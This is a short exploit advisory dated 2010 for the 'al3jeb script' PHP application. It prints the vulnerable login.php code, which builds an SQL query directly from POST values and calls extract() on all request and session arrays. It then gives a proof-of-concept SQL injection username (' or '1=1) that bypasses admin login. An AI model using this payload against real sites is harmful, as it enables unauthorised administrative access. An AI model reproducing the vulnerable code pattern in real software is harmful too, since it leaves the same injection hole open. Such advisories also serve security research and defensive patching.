|   1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47  |  \#'#/ (-.-)  --------------------oOO---(_)---OOo-------------------  |al3jeb script Remote Login Bypass Exploit |  |(works only with magic_quotes_gpc = off)|  ------------------------------------------------------ [!] Discovered: cr4wl3r <cr4wl3r[!]linuxmail.org> [!] Date: 19.01.2010 [!] Remote: yes [!] Vulnerability Code [login.php] : <? session_start(); extract($_POST);  extract($_GET);  extract($_SESSION);  extract($_COOKIE); ?> <?php include("Connections/config.php"); if(isset($_POST['Submit'])) {  $u=$_POST["uname"];  $p=$_POST["pwd"];  $r=mysql_query("select * from admins where AdminName='$u' and AdminPass='$p'"); if($row=mysql_fetch_array($r)) {  $_SESSION['AdminName']=$u;  if(isset($re))  {  setcookie("username",$u,time()+3600);  }  header("location:index.php"); } } ?> [!] PoC: [al3jebscript]/login.php username : ' or '1=1 password : cr4wl3r  |